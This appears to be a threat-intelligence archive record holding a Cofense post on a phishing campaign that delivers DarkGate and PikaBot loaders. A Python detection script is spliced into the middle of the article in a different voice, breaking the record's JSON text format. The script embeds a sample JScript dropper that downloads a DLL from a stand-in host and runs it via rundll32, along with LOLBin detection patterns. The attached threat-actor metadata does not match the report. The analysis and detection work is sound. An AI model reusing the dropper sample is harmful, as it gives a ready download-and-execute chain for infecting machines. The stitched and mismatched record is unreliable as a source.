{
	"id": "9ddf5bb2-1166-4e56-baa8-9230ee6b1d1c",
	"created_at": "2026-04-06T00:09:00.752823Z",
	"updated_at": "2026-04-10T03:21:43.235925Z",
	"deleted_at": null,
	"sha1_hash": "cdc9f86abfcd6a049217aa4cff65a9bd4a062d32",
	"title": "Are DarkGate and PikaBot the new QakBot?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 323292,
	"plain_text": "Are DarkGate and PikaBot the new QakBot?\r\nArchived: 2026-04-05 13:25:46 UTC\r\nBy Dylan Duncan\r\nA malware phishing campaign that began spreading DarkGate malware in September of this year has evolved into one of the most advanced phishing campaigns active in the threat landscape. Since then, the campaign has adopted evasive tactics and anti-analysis techniques to continue distributing DarkGate and, more recently, PikaBot.\r\nThe campaign surged just one month after the last observed QakBot activity and follows the same patterns used by the threat actors that deploy the QakBot malware and botnet. It disseminates a high volume of emails to a wide range of industries, and because the delivered malware acts as a loader, targets are at risk of follow-on threats such as reconnaissance tooling and ransomware.\r\nIn August of this year, the FBI and the Justice Department announced that they had disabled the QakBot infrastructure. Since then, QakBot has remained silent, with no significant activity seen from its infrastructure. While direct attribution between the QakBot threat actors and this campaign is difficult, we can show the similarities between the two.\r\nStarting with the timeline of the campaign, Cofense Intelligence last reported on QakBot towards the end of June, whereas DarkGate reports first emerged during July. The new campaign delivering DarkGate and PikaBot follows the same tactics used in QakBot phishing campaigns: hijacked email threads as the initial lure, URLs with unique patterns that restrict who can reach the payload, and an infection chain nearly identical to what we have seen in QakBot delivery.\r\nThe malware families used also follow suit with what we would expect QakBot affiliates to use. 
Along with many other capabilities, both malware families can act as loaders, able to stage additional malicious payloads onto infected machines.\r\nhttps://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/\r\nPage 1 of 6\r\nFigure 1: Timeline of QakBot and DarkGate/PikaBot Campaign based on Cofense Intelligence Sightings.\r\nInside Look at the Phishing Campaign\r\nThis campaign is undoubtedly a high-level threat because of the tactics, techniques, and procedures (TTPs) that let the phishing emails reach their intended targets and because of the advanced capabilities of the malware being delivered. During the lifespan of the campaign, we have noticed several different infection chains, almost as if the threat actors were testing different malware delivery options.\r\nHowever, a favored infection chain has become apparent and is illustrated in Figure 2. It matches the chain seen in QakBot campaigns during May of this year (Active Threat Reports (ATRs): 325113, 324360, 323510).\r\nThe campaign begins with a hijacked email thread that baits the user into clicking a URL. The URL has added gating layers that serve the malicious payload only to visitors who meet requirements set by the threat actors (geographic location and web browser). The URL downloads a ZIP archive containing a JS file, a JS Dropper: a JScript program that reaches out to another URL to download and run the malware. At this stage the user has been infected with either DarkGate or PikaBot.\r\nFigure 2: Most common infection chain used in the campaign. 
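The JS Dropper stage of the chain above is the part a responder most often gets to examine, because the ZIP and its script usually survive in mail quarantine or on the endpoint. The Python triage script below is an added example and not code from the Cofense post or from the campaign: it scans a JScript file for the Windows Script Host, MSXML and ADODB calls that such droppers rely on (fetch, write to disk, execute), first collapsing the string concatenations droppers use to split those object names, and extracts any URLs. The sample scripts, the indicator weights and the example.invalid URL are constructed for illustration; none of them are indicators taken from the campaign.

```python
import re

# Constructed sample in the style of a WSH JScript dropper (illustration only,
# not a file from the campaign). The split string literals mimic a common
# obfuscation that hides object names from naive pattern matching.
SAMPLE_JS = '''
var h = new ActiveXObject('MSX' + 'ML2.XML' + 'HTTP');
h.open('GET', 'https://example.invalid/update/lib.dll', false);
h.send();
var s = new ActiveXObject('ADODB.' + 'Stream');
s.Type = 1; s.Open(); s.Write(h.responseBody);
s.SaveToFile('C:/Users/Public/lib.dll', 2);
new ActiveXObject('WScript.' + 'Shell').Run('rundll32 C:/Users/Public/lib.dll,Entry', 0);
'''

# Constructed benign WSH script for contrast.
BENIGN_JS = '''
var fso = new ActiveXObject('Scripting.FileSystemObject');
if (fso.FolderExists('C:/Temp')) WScript.Echo('temp folder present');
'''

# (name, regex, weight). The weights are an assumed scoring scheme for this
# example. Patterns deliberately avoid backslash escapes so they read the same
# in any string-escaping context (YAML, JSON, shell).
INDICATORS = [
    ('http_object', r'MSXML2[.]XMLHTTP|WinHttp[.]WinHttpRequest', 3),
    ('file_write',  r'ADODB[.]Stream|SaveToFile',                   3),
    ('exec',        r'WScript[.]Shell|[.]Run[(]|ShellExecute',       3),
    ('binary_mode', r'[.]Type[ ]*=[ ]*1',                            1),
    ('lolbin',      r'rundll32|regsvr32|mshta|powershell|cmd[.]exe', 2),
]

URL_RE = re.compile(r'https?://[A-Za-z0-9./_?=&%:-]+', re.IGNORECASE)
# Two adjacent single-quoted literals joined by +, e.g. 'ADODB.' + 'Stream'.
CONCAT_RE = re.compile(r'''('[^']*')[ ]*[+][ ]*('[^']*')''')


def normalize(src):
    '''Collapse literal-plus-literal concatenations until nothing changes.
    Quote pairing is approximate (no escape handling), which is fine for
    triage; real droppers nest this several levels deep, hence the loop.'''
    prev = None
    while prev != src:
        prev = src
        src = CONCAT_RE.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], src)
    return src


def triage(src):
    '''Return indicator hits, a weighted score, extracted URLs and a verdict.
    The verdict requires all three dropper stages: fetch, write, execute.'''
    text = normalize(src)
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    urls = sorted(set(URL_RE.findall(text)))
    stages = {'http_object', 'file_write', 'exec'}
    verdict = 'likely_dropper' if stages <= set(hits) else 'review'
    return {'score': score, 'hits': hits, 'urls': urls, 'verdict': verdict}


if __name__ == '__main__':
    for label, js in (('sample', SAMPLE_JS), ('benign', BENIGN_JS)):
        print(label, triage(js))
```

Run it against a quarantined JS file by reading the file into triage(); the constructed sample scores 12 with all five indicators and a likely_dropper verdict, while the benign script scores 0. The normalization step is what matters in practice: without it the split 'MSX' + 'ML2.XML' + 'HTTP' literal never matches the http_object rule, which is exactly why droppers split it.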
\r\nDarkGate and PikaBot are both considered advanced malware with loader capabilities and anti-analysis behavior. This assessment rests on the features each family offers and on the steps in each malware config that make analysis harder for researchers.\r\nMost notably, and most appealing to threat actors like the QakBot affiliates, both families can deliver additional payloads once planted on a user’s machine. A successful DarkGate or PikaBot infection could lead to the delivery of crypto mining software, reconnaissance tools, ransomware, or any other malicious file the threat actors wish to install on a victim’s machine. More details on the individual families:\r\nDarkGate was first seen in 2018 and is capable of cryptocurrency mining, credential theft, ransomware, and remote access. These capabilities are not built into the base install; they are loaded and executed on demand, similar to plugins. It has multiple methods of avoiding detection and two distinct methods of escalating privileges. DarkGate makes use of the legitimate AutoIt interpreter and typically runs multiple AutoIt scripts.\r\nPikaBot is a new malware family first seen in 2023. It is classified as a loader because it can deliver additional malware payloads. It contains several evasive techniques to avoid sandboxes, virtual machines, and debuggers. It has been observed to avoid infecting machines in CIS (Commonwealth of Independent States) countries, all of which were members of the former Soviet Union.\r\nEvasive Phishing Tactics Combined with Anti-analysis Techniques\r\nThis campaign combines well-known evasive phishing tactics with techniques known to disrupt malware analysis. The first steps of this campaign are far more complicated than the average phishing attack. 
The threat actors disseminate the phishing emails through hijacked email threads that may be obtained from Microsoft ProxyLogon attacks (CVE-2021-26855). ProxyLogon is a pre-authentication server-side request forgery flaw in on-premises Microsoft Exchange Server that lets a remote attacker bypass authentication and impersonate an administrator, exposing mailbox contents.\r\nReplying to an existing email thread creates an added layer of trust between the threat actor and the target, since the target recognizes the conversation and believes the sender to be trusted. Figure 3 (ATR 351964) below is a real phishing example that reached an enterprise user’s inbox. The threat actors added a message relevant to the hijacked thread along with a malicious link. This is one of the many factors that give campaigns using this tactic a higher chance of success.\r\nFigure 3: Real hijacked email thread example that delivered PikaBot (ATR 351964).\r\nThe malicious URL from the email is shown in Figure 4. It contains a unique pattern like that seen in QakBot phishing campaigns (ATR 325113). These URLs are more than the average phishing URL: the threat actors have added gating layers that limit access to the file the URL delivers. For example, to retrieve the download the visitor must be using the Google Chrome browser from a location chosen by the threat actors, specifically the United States. Visitors who fail these checks are not served the payload, which also hampers automated URL scanners that do not present the expected browser and location.\r\nFigure 4: Phishing URL used to download and run malicious JS Dropper.\r\nExperimenting with Malware Delivery Options\r\nThe most common delivery mechanism seen in this campaign is the JS Dropper; however, Cofense Intelligence has been tracking this campaign since the beginning and has documented each infection chain it has used. 
The most notable, apart from the JS Dropper, are the Excel-DNA Loader, VBS Downloaders, and LNK Downloaders.\r\nThreat actors use these methods to download and install their malware every day, so it is not unusual for a campaign this advanced to incorporate them in its infection chains. The most unusual of them is the Excel-DNA Loader. This is a relatively new delivery mechanism (first seen in 2021) that became popular early on and uses Microsoft Excel add-ins to download and run malicious payloads.\r\nJavaScript Dropper (JS Dropper) is a script written in JScript, Microsoft’s ECMAScript dialect, commonly referred to as JavaScript, and executed by the Windows Script Host (wscript.exe or cscript.exe). These files carry the JS extension and give threat actors a delivery tool that is natively executable on Windows and highly malleable. In most cases they download a Windows PE executable or DLL payload, write it to disk, and run it.\r\nExcel-DNA Loader (Excel DotNET for Applications) is an open-source project for building XLL files, native add-ins for Microsoft Excel. An XLL add-in has many legitimate workplace uses, but threat actors have configured their own add-ins to reach out to payload locations and download and run malicious payloads. This method was first observed in 2021 delivering a wide range of malware, most notably the Dridex banking trojan.\r\nVBS Downloaders are VBScript files that use the scripting runtime available in Windows environments to download and execute malware binaries. 
These scripts use the VBS extension and run under the Windows Script Host, either launched from Microsoft Office documents or invoked directly with cscript.exe or wscript.exe from the command line.\r\nLNK Downloader is a Microsoft LNK shortcut that abuses the trust placed in a seemingly safe file format to gain a foothold on a victim’s computer before downloading and executing a malware payload. These files, recognized by the LNK extension, play the role of a file shortcut in Windows Explorer. However, threat actors have repurposed them so that the shortcut target and arguments point at their own content, in a way that lets script elements execute within the Windows environment.\r\nThis campaign is advanced, well-crafted, and has already evolved since it was first seen in the wild. The threat actors behind the campaign have skills beyond the average phisher, and employees should be aware that this type of threat exists. Cofense Intelligence will continue to monitor the changes and the strong similarities to QakBot that this campaign exhibits.\r\nSource: https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/"
	],
	"report_names": [
		"are-darkgate-and-pikabot-the-new-qakbot"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434140,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cdc9f86abfcd6a049217aa4cff65a9bd4a062d32.pdf",
		"text": "https://archive.orkl.eu/cdc9f86abfcd6a049217aa4cff65a9bd4a062d32.txt",
		"img": "https://archive.orkl.eu/cdc9f86abfcd6a049217aa4cff65a9bd4a062d32.jpg"
	}
}